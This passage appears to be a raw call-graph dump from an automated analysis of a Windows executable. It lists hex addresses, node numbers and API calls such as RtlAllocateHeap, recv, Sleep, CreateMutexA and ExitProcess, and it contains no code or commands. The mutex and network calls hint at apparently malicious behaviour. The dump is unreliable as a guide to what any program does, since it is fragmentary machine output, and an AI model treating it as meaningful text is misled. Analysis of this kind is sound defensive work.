RtlAllocateHeap 10676->10677 10678 adc0fb 10677->10678 10678->10675 10694 ac20a0 10699 adc68b 10694->10699 10697 add64e RtlAllocateHeap 10698 ac20b6 10697->10698 10702 adc3d5 10699->10702 10701 ac20ac 10701->10697 10703 adc3e1 10702->10703 10704 adc3eb 10702->10704 10705 adc3be 10703->10705 10707 adc39e 10703->10707 10704->10701 10715 adcd0a 10705->10715 10707->10704 10711 adccd5 10707->10711 10709 adc3d0 10709->10701 10712 adc3b7 10711->10712 10713 adcce3 InitializeCriticalSectionEx 10711->10713 10712->10701 10713->10712 10716 adcd1f RtlInitializeConditionVariable 10715->10716 10716->10709 10727 ac9ab8 10729 ac9acc 10727->10729 10730 ac9b08 10729->10730 10731 ad7a00 RtlAllocateHeap 10730->10731 10732 ac9b74 10731->10732 10733 ac5c10 4 API calls 10732->10733 10734 ac9b7c 10733->10734 10747 ac8b30 10734->10747 10736 ac9b8d 10784 ad8220 10736->10784 10738 ac9b9c 10739 ad7a00 RtlAllocateHeap 10738->10739 10740 ac9ca9 10739->10740 10741 ac5c10 4 API calls 10740->10741 10742 ac9cb1 10741->10742 10743 ac8b30 4 API calls 10742->10743 10744 ac9cc2 10743->10744 10745 ad8220 RtlAllocateHeap 10744->10745 10746 ac9cd1 10745->10746 10748 ac8b7c 10747->10748 10749 ad7a00 RtlAllocateHeap 10748->10749 10750 ac8b8c 10749->10750 10751 ac5c10 4 API calls 10750->10751 10752 ac8b97 10751->10752 10753 ad80c0 RtlAllocateHeap 10752->10753 10754 ac8be3 10753->10754 10755 ad80c0 RtlAllocateHeap 10754->10755 10756 ac8c35 10755->10756 10757 ad8220 RtlAllocateHeap 10756->10757 10758 ac8c47 shared_ptr 10757->10758 10759 af6c6a RtlAllocateHeap 10758->10759 10760 ac8d01 shared_ptr __floor_pentium4 10758->10760 10761 ac8d2d 10759->10761 10760->10736 10762 ad7a00 RtlAllocateHeap 10761->10762 10763 ac8d8f 10762->10763 10764 ac5c10 4 API calls 10763->10764 10765 ac8d9a 10764->10765 10766 ad80c0 RtlAllocateHeap 10765->10766 10767 ac8dec 10766->10767 10768 ad8220 RtlAllocateHeap 10767->10768 10770 ac8dfe shared_ptr 10768->10770 10769 ac8e7e shared_ptr __floor_pentium4 10769->10736 10770->10769 10771 af6c6a RtlAllocateHeap 10770->10771 10772 ac8eaa 10771->10772 10773 ad7a00 RtlAllocateHeap 10772->10773 10774 ac8f0f 10773->10774 10775 ac5c10 4 API calls 10774->10775 10776 ac8f1a 10775->10776 10777 ad80c0 RtlAllocateHeap 10776->10777 10778 ac8f6c 10777->10778 10779 ad8220 RtlAllocateHeap 10778->10779 10781 ac8f7e shared_ptr 10779->10781 10780 ac8ffe shared_ptr __floor_pentium4 10780->10736 10781->10780 10782 af6c6a RtlAllocateHeap 10781->10782 10783 ac902a 10782->10783 10785 ad8248 10784->10785 10786 ad8292 10784->10786 10785->10786 10787 ad8251 10785->10787 10791 ad82a1 10786->10791 10797 ad8f40 10786->10797 10792 ad9280 10787->10792 10790 ad825a 10790->10738 10791->10738 10793 ad9294 10792->10793 10796 ad92a5 __cftof 10793->10796 10818 ad94e0 10793->10818 10795 ad932b 10795->10790 10796->10790 10798 ad908e 10797->10798 10799 ad8f6b 10797->10799 10800 ad9270 RtlAllocateHeap 10798->10800 10803 ad8fdc 10799->10803 10804 ad8fb2 10799->10804 10801 ad9093 10800->10801 10802 ac2480 RtlAllocateHeap 10801->10802 10810 ad8fc3 __cftof 10802->10810 10808 add3e2 RtlAllocateHeap 10803->10808 10803->10810 10804->10801 10805 ad8fbd 10804->10805 10807 add3e2 RtlAllocateHeap 10805->10807 10806 af6c6a RtlAllocateHeap 10809 ad909d 10806->10809 10807->10810 10808->10810 10811 ad90b8 10809->10811 10812 ac2480 Concurrency::cancel_current_task 10809->10812 10815 ad90be 10809->10815 10810->10806 10814 ad904c shared_ptr __cftof 10810->10814 10813 add3e2 RtlAllocateHeap 10811->10813 10816 af38af ___std_exception_copy RtlAllocateHeap 10812->10816 10813->10815 10814->10791 10815->10791 10817 ac24c3 10816->10817 10817->10791 10819 ad9619 10818->10819 10820 ad950b 10818->10820 10821 ad9270 RtlAllocateHeap 10819->10821 10824 ad9579 10820->10824 10825 ad9552 10820->10825 10822 ad961e 10821->10822 10823 ac2480 RtlAllocateHeap 10822->10823 10831 ad9563 __cftof 10823->10831 10829 add3e2 RtlAllocateHeap 10824->10829 10824->10831 10825->10822 10826 ad955d 10825->10826 10828 add3e2 RtlAllocateHeap 10826->10828 10827 af6c6a RtlAllocateHeap 10830 ad9628 shared_ptr 10827->10830 10828->10831 10829->10831 10830->10795 10831->10827 10832 ad95e1 shared_ptr __cftof 10831->10832 10832->10795 10833 ac42b0 10836 ac3ac0 10833->10836 10835 ac42bb shared_ptr 10837 ac3af9 10836->10837 10838 af6c6a RtlAllocateHeap 10837->10838 10842 ac3b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 10837->10842 10839 ac3be6 10838->10839 10843 ac3c38 10839->10843 10857 ac32d0 10839->10857 10840 ac32d0 6 API calls 10845 ac3c5f 10840->10845 10842->10835 10843->10840 10843->10845 10844 ac3c68 10844->10835 10845->10844 10874 ac3810 10845->10874 10878 adc6ac 10857->10878 10860 ac333c __Mtx_unlock 10862 adc26a 5 API calls 10860->10862 10863 ac3350 __floor_pentium4 10860->10863 10861 ac3314 10861->10860 10881 adc26a 10861->10881 10864 ac3377 10862->10864 10863->10843 10865 adc6ac GetSystemTimePreciseAsFileTime 10864->10865 10866 ac33af 10865->10866 10867 adc26a 5 API calls 10866->10867 10868 ac33b6 10866->10868 10867->10868 10869 adc26a 5 API calls 10868->10869 10870 ac33d7 __Mtx_unlock 10868->10870 10869->10870 10871 adc26a 5 API calls 10870->10871 10872 ac33eb 10870->10872 10873 ac340e 10871->10873 10872->10843 10873->10843 10875 ac381c 10874->10875 10955 ac2440 10875->10955 10885 adc452 10878->10885 10880 adc6b9 10880->10861 10882 adc292 10881->10882 10883 adc274 10881->10883 10882->10882 10883->10882 10902 adc297 10883->10902 10886 adc4a8 10885->10886 10889 adc47a __floor_pentium4 10885->10889 10886->10889 10891 adcf6b 10886->10891 10888 adc4fd __Xtime_diff_to_millis2 10888->10889 10890 adcf6b _xtime_get GetSystemTimePreciseAsFileTime 10888->10890 10889->10880 10890->10888 10892 adcf7a 10891->10892 10894 adcf87 __aulldvrm 10891->10894 10892->10894 10895 adcf44 10892->10895 10894->10888 10898 adcbea 10895->10898 10899 adcbfb GetSystemTimePreciseAsFileTime 10898->10899 10900 adcc07 10898->10900 10899->10900 10900->10894 10907 ac2ae0 10902->10907 10904 adc2ae 10914 adc1ff 10904->10914 10906 adc2bf Concurrency::cancel_current_task 10922 adbedf 10907->10922 10909 ac2af4 __dosmaperr 10909->10904 10910 afa671 __cftof 4 API calls 10909->10910 10913 af6ccc 10910->10913 10911 af8bec __cftof 4 API calls 10912 af6cf6 10911->10912 10913->10911 10915 adc20b __EH_prolog3_GS 10914->10915 10916 ad80c0 RtlAllocateHeap 10915->10916 10917 adc23d 10916->10917 10929 ac26b0 10917->10929 10919 adc252 10946 ad7970 10919->10946 10921 adc25a 10921->10906 10925 adcc31 10922->10925 10926 adcc3f InitOnceExecuteOnce 10925->10926 10928 adbef2 10925->10928 10926->10928 10928->10909 10930 ad7a00 RtlAllocateHeap 10929->10930 10931 ac2702 10930->10931 10932 ac2725 10931->10932 10933 ad8f40 RtlAllocateHeap 10931->10933 10934 ad8f40 RtlAllocateHeap 10932->10934 10935 ac278e 10932->10935 10933->10932 10934->10935 10936 ac27ed shared_ptr 10935->10936 10938 ac28b8 10935->10938 10937 af38af ___std_exception_copy RtlAllocateHeap 10936->10937 10941 ac284b 10937->10941 10939 af6c6a RtlAllocateHeap 10938->10939 10939->10941 10940 ac287a shared_ptr __floor_pentium4 10940->10919 10941->10940 10942 af6c6a RtlAllocateHeap 10941->10942 10943 ac28c2 10942->10943 10951 af3912 10943->10951 10945 ac28e5 shared_ptr 10945->10919 10947 ad797b 10946->10947 10948 ad7996 shared_ptr 10946->10948 10947->10948 10949 af6c6a RtlAllocateHeap 10947->10949 10948->10921 10950 ad79ba 10949->10950 10952 af391f 10951->10952 10954 af3926 10951->10954 10953 af8ba3 ___std_exception_destroy RtlAllocateHeap 10952->10953 10953->10954 10954->10945 10958 adb5d6 10955->10958 10957 ac2472 10959 adb5f1 Concurrency::cancel_current_task 10958->10959 10960 af8bec __cftof 4 API calls 10959->10960 10962 adb658 __cftof __floor_pentium4 10959->10962 10961 adb69f 10960->10961 10962->10957 10963 ac3c8e 10964 ac3c98 10963->10964 10965 ac3cb4 10964->10965 10982 ac2410 10964->10982 10969 ac3810 4 API calls 10965->10969 10970 ac3ccf 10969->10970 10971 ac3810 4 API calls 10970->10971 10972 ac3cdb 10971->10972 10975 ac3d52 10972->10975 10997 ad7d50 10972->10997 10974 add3e2 RtlAllocateHeap 10976 ac3d84 10974->10976 10975->10974 10977 ad7d50 RtlAllocateHeap 10976->10977 10979 ac3e03 10976->10979 10977->10979 10978 ac3e9b shared_ptr 10979->10978 10980 af6c6a RtlAllocateHeap 10979->10980 10981 ac3ec1 10980->10981 10983 ac2424 10982->10983 11029 adb52d 10983->11029 10986 ac3ce0 10987 ac3d42 10986->10987 10990 ac3d52 10986->10990 10988 ad7d50 RtlAllocateHeap 10987->10988 10988->10990 10989 add3e2 RtlAllocateHeap 10991 ac3d84 10989->10991 10990->10989 10992 ad7d50 RtlAllocateHeap 10991->10992 10994 ac3e03 10991->10994 10992->10994 10993 ac3e9b shared_ptr 10993->10965 10994->10993 10995 af6c6a RtlAllocateHeap 10994->10995 10996 ac3ec1 10995->10996 10998 ad7dcb 10997->10998 10999 ad7d62 10997->10999 11000 ac2480 RtlAllocateHeap 10998->11000 11001 ad7d6d 10999->11001 11002 ad7d9c 10999->11002 11004 ad7d7a 11000->11004 11001->10998 11005 ad7d74 11001->11005 11003 ad7db9 11002->11003 11006 add3e2 RtlAllocateHeap 11002->11006 11003->10975 11007 af6c6a RtlAllocateHeap 11004->11007 11010 ad7d83 11004->11010 11008 add3e2 RtlAllocateHeap 11005->11008 11009 ad7da6 11006->11009 11015 ad7dd5 11007->11015 11008->11004 11009->10975 11010->10975 11011 ad7f20 11012 ad9270 RtlAllocateHeap 11011->11012 11025 ad7e91 __cftof 11012->11025 11013 ad7e01 11013->10975 11014 ad7f1b 11019 ac2480 RtlAllocateHeap 11014->11019 11015->11011 11015->11013 11015->11014 11017 ad7ea7 11015->11017 11018 ad7e80 11015->11018 11016 af6c6a RtlAllocateHeap 11023 ad7f2a __cftof 11016->11023 11022 add3e2 RtlAllocateHeap 11017->11022 11017->11025 11018->11014 11020 ad7e8b 11018->11020 11019->11011 11021 add3e2 RtlAllocateHeap 11020->11021 11021->11025 11022->11025 11024 ad7f61 shared_ptr 11023->11024 11027 af6c6a RtlAllocateHeap 11023->11027 11024->10975 11025->11016 11026 ad7f02 shared_ptr 11025->11026 11026->10975 11028 ad7f7c 11027->11028 11037 af3aed 11029->11037 11031 ac242a 11031->10986 11032 adb5a5 ___std_exception_copy 11044 adb1ad 11032->11044 11033 adb598 11040 adaf56 11033->11040 11048 af4f29 11037->11048 11039 adb555 11039->11031 11039->11032 11039->11033 11041 adaf9f ___std_exception_copy 11040->11041 11043 adafb2 shared_ptr 11041->11043 11060 adb39f 11041->11060 11043->11031 11045 adb1d8 11044->11045 11047 adb1e1 shared_ptr 11044->11047 11046 adb39f 5 API calls 11045->11046 11046->11047 11047->11031 11055 af4f37 11048->11055 11050 af4f2e __cftof 11050->11039 11051 afd634 __cftof 4 API calls 11050->11051 11054 af8bfc __cftof 11050->11054 11051->11054 11052 af65ed __cftof 3 API calls 11053 af8c2f 11052->11053 11054->11052 11056 af4f40 11055->11056 11058 af4f43 11055->11058 11056->11050 11057 af4f77 11057->11050 11058->11057 11059 af8ba3 ___std_exception_destroy RtlAllocateHeap 11058->11059 11059->11057 11061 adbedf InitOnceExecuteOnce 11060->11061 11062 adb3e1 11061->11062 11063 adb3e8 11062->11063 11071 af6cbb 11062->11071 11063->11043 11072 af6cc7 __dosmaperr 11071->11072 11073 afa671 __cftof 4 API calls 11072->11073 11076 af6ccc 11073->11076 11074 af8bec __cftof 4 API calls 11075 af6cf6 11074->11075 11076->11074 11117 ad8680 11118 ad86e0 11117->11118 11126 ad7760 11118->11126 11120 ad86f9 11121 ad8f40 RtlAllocateHeap 11120->11121 11122 ad8714 11120->11122 11121->11122 11123 ad8f40 RtlAllocateHeap 11122->11123 11125 ad8769 11122->11125 11124 ad87b1 11123->11124 11127 ad7864 shared_ptr __cftof 11126->11127 11128 ad777b 11126->11128 11127->11120 11128->11127 11129 ad78f1 11128->11129 11133 ad77ea 11128->11133 11134 ad7811 11128->11134 11139 ad77fb __cftof 11128->11139 11130 ad9270 RtlAllocateHeap 11129->11130 11131 ad78f6 11130->11131 11132 ac2480 RtlAllocateHeap 11131->11132 11135 ad78fb 11132->11135 11133->11131 11137 add3e2 RtlAllocateHeap 11133->11137 11136 add3e2 RtlAllocateHeap 11134->11136 11134->11139 11136->11139 11137->11139 11138 af6c6a RtlAllocateHeap 11138->11129 11139->11127 11139->11138 11140 aca682 11141 aca68a shared_ptr 11140->11141 11142 aca949 11141->11142 11143 aca75d shared_ptr 11141->11143 11144 af6c6a RtlAllocateHeap 11142->11144 11147 ad80c0 RtlAllocateHeap 11143->11147 11145 aca94e 11144->11145 11146 af6c6a RtlAllocateHeap 11145->11146 11149 aca953 Sleep CreateMutexA 11146->11149 11148 aca903 11147->11148 11150 aca98e 11149->11150 11151 ac5a9e 11154 ac5a61 11151->11154 11152 ad80c0 RtlAllocateHeap 11152->11154 11154->11151 11154->11152 11155 ad7a00 RtlAllocateHeap 11154->11155 11156 ac5bdd __floor_pentium4 11154->11156 11157 ac5730 11154->11157 11155->11154 11159 ac5860 shared_ptr 11157->11159 11165 ac5799 shared_ptr 11157->11165 11158 ac592a 11166 ad8200 11158->11166 11162 ac5900 shared_ptr __floor_pentium4 11159->11162 11163 af6c6a RtlAllocateHeap 11159->11163 11160 ad80c0 RtlAllocateHeap 11160->11165 11162->11154 11164 ac5934 11163->11164 11165->11158 11165->11159 11165->11160 11169 adc1d9 11166->11169 11168 ad820a 11172 adc15d 11169->11172 11171 adc1ea Concurrency::cancel_current_task 11171->11168 11173 ac22e0 std::invalid_argument::invalid_argument RtlAllocateHeap 11172->11173 11174 adc16f 11173->11174 11174->11171 11182 b044f2 11183 b0450c 11182->11183 11184 b044ff 11182->11184 11186 af75f6 __dosmaperr RtlAllocateHeap 11183->11186 11188 b04518 11183->11188 11185 af75f6 __dosmaperr RtlAllocateHeap 11184->11185 11187 b04504 11185->11187 11189 b04539 11186->11189 11190 af6c5a __cftof RtlAllocateHeap 11189->11190 11190->11187 11191 ac6ae9 11194 ac6b01 11191->11194 11192 ad80c0 RtlAllocateHeap 11193 ac6bac 11192->11193 11195 ad9280 RtlAllocateHeap 11193->11195 11194->11192 11196 ac6bbd shared_ptr 11194->11196 11195->11196 11197 ad80c0 RtlAllocateHeap 11196->11197 11198 ac6ce3 shared_ptr __floor_pentium4 11197->11198 11251 add0c7 11253 add0d7 11251->11253 11252 add17f 11253->11252 11254 add17b RtlWakeAllConditionVariable 11253->11254 11260 ac20c0 11261 adc68b __Mtx_init_in_situ 2 API calls 11260->11261 11262 ac20cc 11261->11262 11263 add64e RtlAllocateHeap 11262->11263 11264 ac20d6 11263->11264 11275 ace0c0 recv 11276 ace122 recv 11275->11276 11277 ace157 recv 11276->11277 11278 ace191 11277->11278 11279 ace2b3 __floor_pentium4 11278->11279 11280 adc6ac GetSystemTimePreciseAsFileTime 11278->11280 11281 ace2ee 11280->11281 11282 adc26a 5 API calls 11281->11282 11283 ace358 11282->11283 11284 ac2ec0 11285 ac2f06 11284->11285 11294 ac2f6f 11284->11294 11286 adc6ac GetSystemTimePreciseAsFileTime 11285->11286 11287 ac2f12 11286->11287 11288 ac2f1d 11287->11288 11289 ac301e 11287->11289 11292 add3e2 RtlAllocateHeap 11288->11292 11293 ac2f30 __Mtx_unlock 11288->11293 11290 adc26a 5 API calls 11289->11290 11291 ac3024 11290->11291 11295 adc26a 5 API calls 11291->11295 11292->11293 11293->11291 11293->11294 11296 adc6ac GetSystemTimePreciseAsFileTime 11294->11296 11305 ac2fef 11294->11305 11297 ac2fb9 11295->11297 11296->11297 11298 adc26a 5 API calls 11297->11298 11299 ac2fc0 __Mtx_unlock 11297->11299 11298->11299 11300 adc26a 5 API calls 11299->11300 11301 ac2fd8 11299->11301 11300->11301 11302 adc26a 5 API calls 11301->11302 11301->11305 11303 ac303c 11302->11303 11304 adc6ac GetSystemTimePreciseAsFileTime 11303->11304 11314 ac3080 shared_ptr __Mtx_unlock 11304->11314 11306 adc26a 5 API calls 11307 ac31cb 11306->11307 11308 adc26a 5 API calls 11307->11308 11309 ac31d1 11308->11309 11310 adc26a 5 API calls 11309->11310 11316 ac3193 __Mtx_unlock 11310->11316 11311 ac31a7 __floor_pentium4 11312 adc26a 5 API calls 11313 ac31dd 11312->11313 11314->11307 11314->11311 11315 adc6ac GetSystemTimePreciseAsFileTime 11314->11315 11317 ac315f 11314->11317 11315->11317 11316->11311 11316->11312 11317->11306 11317->11309 11317->11316 11343 ac9adc 11344 ac9aea 11343->11344 11348 ac9afe shared_ptr 11343->11348 11345 aca917 11344->11345 11344->11348 11346 aca953 Sleep CreateMutexA 11345->11346 11347 af6c6a RtlAllocateHeap 11345->11347 11349 aca98e 11346->11349 11347->11346 11350 ad7a00 RtlAllocateHeap 11348->11350 11351 ac9b74 11350->11351 11352 ac5c10 4 API calls 11351->11352 11353 ac9b7c 11352->11353 11354 ac8b30 4 API calls 11353->11354 11355 ac9b8d 11354->11355 11356 ad8220 RtlAllocateHeap 11355->11356 11357 ac9b9c 11356->11357 11358 ad7a00 RtlAllocateHeap 11357->11358 11359 ac9ca9 11358->11359 11360 ac5c10 4 API calls 11359->11360 11361 ac9cb1 11360->11361 11362 ac8b30 4 API calls 11361->11362 11363 ac9cc2 11362->11363 11364 ad8220 RtlAllocateHeap 11363->11364 11365 ac9cd1 11364->11365 9664 afd82f 9667 afd83c __dosmaperr 9664->9667 9665 afd867 RtlAllocateHeap 9666 afd87a __dosmaperr 9665->9666 9665->9667 9667->9665 9667->9666 9668 af6629 9671 af64c7 9668->9671 9672 af64d5 __cftof 9671->9672 9673 af6520 9672->9673 9676 af652b 9672->9676 9675 af652a 9682 afa302 GetPEB 9676->9682 9678 af6535 9679 af654a __cftof 9678->9679 9680 af653a GetPEB 9678->9680 9681 af6562 ExitProcess 9679->9681 9680->9679 9683 afa31c __cftof 9682->9683 9683->9678 11376 ac1020 11377 ad80c0 RtlAllocateHeap 11376->11377 11378 ac1031 11377->11378 11379 add64e RtlAllocateHeap 11378->11379 11380 ac103b 11379->11380 11417 ac1000 11418 add64e RtlAllocateHeap 11417->11418 11419 ac100a 11418->11419 11430 ac2e00 11431 ac2e28 11430->11431 11432 adc68b __Mtx_init_in_situ 2 API calls 11431->11432 11433 ac2e33 11432->11433 11459 aca418 11460 aca420 shared_ptr 11459->11460 11461 aca93f 11460->11461 11463 aca4f3 shared_ptr 11460->11463 11462 af6c6a RtlAllocateHeap 11461->11462 11464 aca944 11462->11464 11466 ad80c0 RtlAllocateHeap 11463->11466 11465 af6c6a RtlAllocateHeap 11464->11465 11468 aca949 11465->11468 11467 aca903 11466->11467 11469 af6c6a RtlAllocateHeap 11468->11469 11470 aca94e 11469->11470 11471 af6c6a RtlAllocateHeap 11470->11471 11472 aca953 Sleep CreateMutexA 11471->11472 11473 aca98e 11472->11473 11529 accc79 11530 accc84 shared_ptr 11529->11530 11531 acccda shared_ptr __floor_pentium4 11530->11531 11532 af6c6a RtlAllocateHeap 11530->11532 11533 acce36 11532->11533 11534 ad7a00 RtlAllocateHeap 11533->11534 11535 acce92 11534->11535 11536 ac5c10 4 API calls 11535->11536 11537 acce9d 11536->11537 11539 acca70 11537->11539 11540 accadd 11539->11540 11542 ad7a00 RtlAllocateHeap 11540->11542 11558 accc87 11540->11558 11541 acccda shared_ptr __floor_pentium4 11543 acccee 11542->11543 11544 ac5c10 4 API calls 11543->11544 11546 acccf9 11544->11546 11545 af6c6a RtlAllocateHeap 11547 acce36 11545->11547 11559 ac9030 11546->11559 11549 ad7a00 RtlAllocateHeap 11547->11549 11551 acce92 11549->11551 11550 accd0d 11552 ad8220 RtlAllocateHeap 11550->11552 11553 ac5c10 4 API calls 11551->11553 11554 accd1f 11552->11554 11555 acce9d 11553->11555 11557 ad8f40 RtlAllocateHeap 11554->11557 11556 acca70 4 API calls 11555->11556 11557->11558 11558->11541 11558->11545 11560 ac907f 11559->11560 11561 ad7a00 RtlAllocateHeap 11560->11561 11562 ac908f 11561->11562 11563 ac5c10 4 API calls 11562->11563 11564 ac909a 11563->11564 11565 ad80c0 RtlAllocateHeap 11564->11565 11566 ac90ec 11565->11566 11567 ad8220 RtlAllocateHeap 11566->11567 11568 ac90fe shared_ptr 11567->11568 11569 af6c6a RtlAllocateHeap 11568->11569 11570 ac917e shared_ptr __floor_pentium4 11568->11570 11571 ac91aa 11569->11571 11570->11550 11572 ac4276 11573 ac2410 5 API calls 11572->11573 11574 ac427f 11573->11574 11575 ac3ce0 RtlAllocateHeap 11574->11575 11576 ac428f 11575->11576 11586 ac3c47 11587 ac3c51 11586->11587 11589 ac32d0 6 API calls 11587->11589 11590 ac3c5f 11587->11590 11588 ac3c68 11589->11590 11590->11588 11591 ac3810 4 API calls 11590->11591 11592 ac3cdb 11591->11592 11593 ad7d50 RtlAllocateHeap 11592->11593 11595 ac3d52 11592->11595 11593->11595 11594 add3e2 RtlAllocateHeap 11596 ac3d84 11594->11596 11595->11594 11597 ad7d50 RtlAllocateHeap 11596->11597 11599 ac3e03 11596->11599 11597->11599 11598 ac3e9b shared_ptr 11599->11598 11600 af6c6a RtlAllocateHeap 11599->11600 11601 ac3ec1 11600->11601 11602 af6a44 11603 af6a5c 11602->11603 11604 af6a52 11602->11604 11620 af698d 11603->11620 11615 afb655 11604->11615 11607 af6a59 11608 af6a76 11623 af68ed 11608->11623 11611 afb655 RtlAllocateHeap 11612 af6a8a 11611->11612 11613 af6aa8 11612->11613 11614 afadf5 __freea RtlAllocateHeap 11612->11614 11614->11613 11617 afb662 11615->11617 11616 afb679 11616->11607 11617->11616 11626 af75c0 11617->11626 11621 af690a __cftof 4 API calls 11620->11621 11622 af699f 11621->11622 11622->11608 11634 af683b 11623->11634 11631 af75e3 11626->11631 11628 af75cb __dosmaperr 11629 af75f6 __dosmaperr RtlAllocateHeap 11628->11629 11630 af75de 11629->11630 11630->11607 11632 afa7c8 __dosmaperr RtlAllocateHeap 11631->11632 11633 af75e8 11632->11633 11633->11628 11635 af6849 11634->11635 11636 af6863 11634->11636 11647 af69cc 11635->11647 11638 af686a 11636->11638 11640 af6889 __cftof 11636->11640 11644 af6853 11638->11644 11651 af69e6 11638->11651 11641 af69e6 RtlAllocateHeap 11640->11641 11642 af689f __cftof 11640->11642 11641->11642 11643 af75c0 __dosmaperr RtlAllocateHeap 11642->11643 11642->11644 11645 af68ab 11643->11645 11644->11611 11644->11612 11646 af75f6 __dosmaperr RtlAllocateHeap 11645->11646 11646->11644 11648 af69d7 11647->11648 11649 af69df 11647->11649 11650 afadf5 __freea RtlAllocateHeap 11648->11650 11649->11644 11650->11649 11652 af69cc RtlAllocateHeap 11651->11652 11653 af69f4 11652->11653 11656 af6a25 11653->11656 11657 afb04b __cftof RtlAllocateHeap 11656->11657 11658 af6a05 11657->11658 11658->11644 11702 ac3440 11707 ac2b30 11702->11707 11704 ac344f Concurrency::cancel_current_task 11705 af38af ___std_exception_copy RtlAllocateHeap 11704->11705 11706 ac3483 11705->11706 11708 af38af ___std_exception_copy RtlAllocateHeap 11707->11708 11709 ac2b68 __floor_pentium4 11708->11709 11709->11704 11710 ac3840 11711 ac38f6 11710->11711 11714 ac385f 11710->11714 11712 ac3920 11720 ad91e0 11712->11720 11714->11711 11714->11712 11717 ac38cd shared_ptr 11714->11717 11718 ac391b 11714->11718 11715 ac3925 11716 ad7d50 RtlAllocateHeap 11716->11711 11717->11716 11719 af6c6a RtlAllocateHeap 11718->11719 11719->11712 11721 adc1b9 RtlAllocateHeap 11720->11721 11722 ad91ea 11721->11722 11722->11715 9684 aca856 9685 aca870 9684->9685 9686 aca892 shared_ptr 9684->9686 9685->9686 9687 aca94e 9685->9687 9696 ad80c0 9686->9696 9693 af6c6a 9687->9693 9690 aca903 9691 aca953 Sleep CreateMutexA 9692 aca98e 9691->9692 9711 af6bf6 9693->9711 9695 af6c79 __cftof 9699 ad80de 9696->9699 9701 ad8104 9696->9701 9697 ad81ee 9870 ad9270 9697->9870 9699->9690 9700 ad81f3 9873 ac2480 9700->9873 9701->9697 9702 ad817d 9701->9702 9703 ad8158 9701->9703 9707 add3e2 RtlAllocateHeap 9702->9707 9709 ad8169 __cftof 9702->9709 9703->9700 9865 add3e2 9703->9865 9707->9709 9708 af6c6a RtlAllocateHeap 9708->9697 9709->9708 9710 ad81d0 shared_ptr 9709->9710 9710->9690 9717 afa7c8 9711->9717 9713 af6c0f 9713->9695 9714 af6c01 __cftof 9714->9713 9715 af6bf6 __cftof RtlAllocateHeap 9714->9715 9716 af6c66 9715->9716 9716->9695 9718 afa7d2 __dosmaperr 9717->9718 9720 afa7eb 9718->9720 9728 afd82f 9718->9728 9720->9714 9721 afa813 __dosmaperr 9722 afa853 9721->9722 9723 afa81b __dosmaperr 9721->9723 9736 afa49f 9722->9736 9732 afadf5 9723->9732 9727 afadf5 __freea RtlAllocateHeap 9727->9720 9731 afd83c __dosmaperr 9728->9731 9729 afd867 RtlAllocateHeap 9730 afd87a __dosmaperr 9729->9730 9729->9731 9730->9721 9731->9729 9731->9730 9733 afae00 9732->9733 9735 afae1b __dosmaperr 9732->9735 9733->9735 9740 af75f6 9733->9740 9735->9720 9737 afa50d __dosmaperr 9736->9737 9743 afa445 9737->9743 9739 afa536 9739->9727 9741 afa7c8 __dosmaperr RtlAllocateHeap 9740->9741 9742 af75fb 9741->9742 9742->9735 9744 afa451 __dosmaperr 9743->9744 9747 afa626 9744->9747 9746 afa473 __dosmaperr 9746->9739 9748 afa65c __cftof 9747->9748 9749 afa635 __cftof 9747->9749 9748->9746 9749->9748 9751 aff35f 9749->9751 9752 aff3df 9751->9752 9755 aff375 9751->9755 9754 afadf5 __freea RtlAllocateHeap 9752->9754 9778 aff42d 9752->9778 9756 aff401 9754->9756 9755->9752 9759 afadf5 __freea RtlAllocateHeap 9755->9759 9760 aff3a8 9755->9760 9757 afadf5 __freea RtlAllocateHeap 9756->9757 9761 aff414 9757->9761 9758 aff43b 9763 aff49b 9758->9763 9776 afadf5 RtlAllocateHeap __freea 9758->9776 9764 aff39d 9759->9764 9765 afadf5 __freea RtlAllocateHeap 9760->9765 9777 aff3ca 9760->9777 9766 afadf5 __freea RtlAllocateHeap 9761->9766 9762 afadf5 __freea RtlAllocateHeap 9767 aff3d4 9762->9767 9769 afadf5 __freea RtlAllocateHeap 9763->9769 9779 afef3c 9764->9779 9771 aff3bf 9765->9771 9772 aff422 9766->9772 9768 afadf5 __freea RtlAllocateHeap 9767->9768 9768->9752 9773 aff4a1 9769->9773 9807 aff03a 9771->9807 9775 afadf5 __freea RtlAllocateHeap 9772->9775 9773->9748 9775->9778 9776->9758 9777->9762 9819 aff4d0 9778->9819 9780 afef4d 9779->9780 9806 aff036 9779->9806 9781 afef5e 9780->9781 9783 afadf5 __freea RtlAllocateHeap 9780->9783 9782 afef70 9781->9782 9784 afadf5 __freea RtlAllocateHeap 9781->9784 9785 afef82 9782->9785 9786 afadf5 __freea RtlAllocateHeap 9782->9786 9783->9781 9784->9782 9787 afef94 9785->9787 9788 afadf5 __freea RtlAllocateHeap 9785->9788 9786->9785 9789 afadf5 __freea RtlAllocateHeap 9787->9789 9793 afefa6 9787->9793 9788->9787 9789->9793 9790 afadf5 __freea RtlAllocateHeap 9792 afefb8 9790->9792 9791 afefca 9795 afefdc 9791->9795 9796 afadf5 __freea RtlAllocateHeap 9791->9796 9792->9791 9794 afadf5 __freea RtlAllocateHeap 9792->9794 9793->9790 9793->9792 9794->9791 9797 afefee 9795->9797 9799 afadf5 __freea RtlAllocateHeap 9795->9799 9796->9795 9798 aff000 9797->9798 9800 afadf5 __freea RtlAllocateHeap 9797->9800 9801 aff012 9798->9801 9802 afadf5 __freea RtlAllocateHeap 9798->9802 9799->9797 9800->9798 9803 aff024 9801->9803 9804 afadf5 __freea RtlAllocateHeap 9801->9804 9802->9801 9805 afadf5 __freea RtlAllocateHeap 9803->9805 9803->9806 9804->9803 9805->9806 9806->9760 9808 aff047 9807->9808 9818 aff09f 9807->9818 9809 afadf5 __freea RtlAllocateHeap 9808->9809 9812 aff057 9808->9812 9809->9812 9810 aff07b 9815 aff08d 9810->9815 9816 afadf5 __freea RtlAllocateHeap 9810->9816 9811 aff069 9811->9810 9814 afadf5 __freea RtlAllocateHeap 9811->9814 9812->9811 9813 afadf5 __freea RtlAllocateHeap 9812->9813 9813->9811 9814->9810 9817 afadf5 __freea RtlAllocateHeap 9815->9817 9815->9818 9816->9815 9817->9818 9818->9777 9820 aff4dd 9819->9820 9824 aff4fc 9819->9824 9820->9824 9825 aff0db 9820->9825 9823 afadf5 __freea RtlAllocateHeap 9823->9824 9824->9758 9826 aff1b9 9825->9826 9827 aff0ec 9825->9827 9826->9823 9861 aff0a3 9827->9861 9830 aff0a3 __cftof RtlAllocateHeap 9831 aff0ff 9830->9831 9832 aff0a3 __cftof RtlAllocateHeap 9831->9832 